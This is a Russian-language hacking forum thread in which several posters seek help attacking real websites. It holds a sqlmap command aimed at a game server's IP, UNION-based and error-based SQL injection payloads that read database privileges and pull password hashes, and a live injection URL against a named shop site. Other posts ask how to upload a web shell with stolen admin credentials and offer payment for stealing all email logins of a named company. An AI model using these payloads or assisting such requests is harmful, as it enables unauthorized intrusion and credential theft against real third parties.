Просканировал с помощью sqlmap один игровой сервер sqlmap --url="http://95.163.86.72/cgi-bin/webstrk.exe/strike?t=1" --data="position=0&tmpid=01234567890234567890" в логе написало: ...... [16:45:33] [INFO] POST parameter 'position' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [16:45:44] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft Access' ..... [16:51:10] [WARNING] POST parameter 'position' is not injectable [16:51:10] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') ..... Тестировал несколько раз. Просмотрев лог запросов увидел что срабатывало на position=-6458' OR (3053=8541) position=0%22%29%20AND%206045%3D4434%20AND%20%28%22sLat%22%3D%22sLat position=0%20AND%205338%3D7364 Вручную перебирал - ничего толкового не выходило (ошибки так таковой нету). Вопрос - Есть ли вообще инъекция и какая база данных? (Microsoft Access или нет?)
+UnIon+selECt+group_concat(user,0x3a,file_priv),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user не выводит: Y, N В чем ошибка? Как узнать права?!
бандиты подскажите плз короче не могу залить шелл, пас и логин от админки есть, но админку найти не могу ( короче беда, подскажите че придумать можно?
Ребята помогите раскрутить mssql не как не доходит! http://www.ekb.spk.ru/spkekb/shop/prod_detail/_t_/prod=krug_nerzhaveyuschii
http://www.ekb.spk.ru/spkekb/shop/order.asp/_t_/prod=krug_nerzhaveyuschii'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('PrValues','SAP_Param5'))--
Друзья у кого нибудь есть желание за возногрождение поработать на этим сайтом tehkomplekt-ural.ru а именно мне нужно все логины и пассы почты их если что пишите в личку
Привет всем!) Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида " " Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
and extractvalue(rand(),concat(0x3a,(select mid(pass,1,31) from server.users limit 1,1))))-- and extractvalue(rand(),concat(0x3a,(select mid(pass,32,31) from server.users limit 1,1))))-- У него еще символ на конкатенацию ушел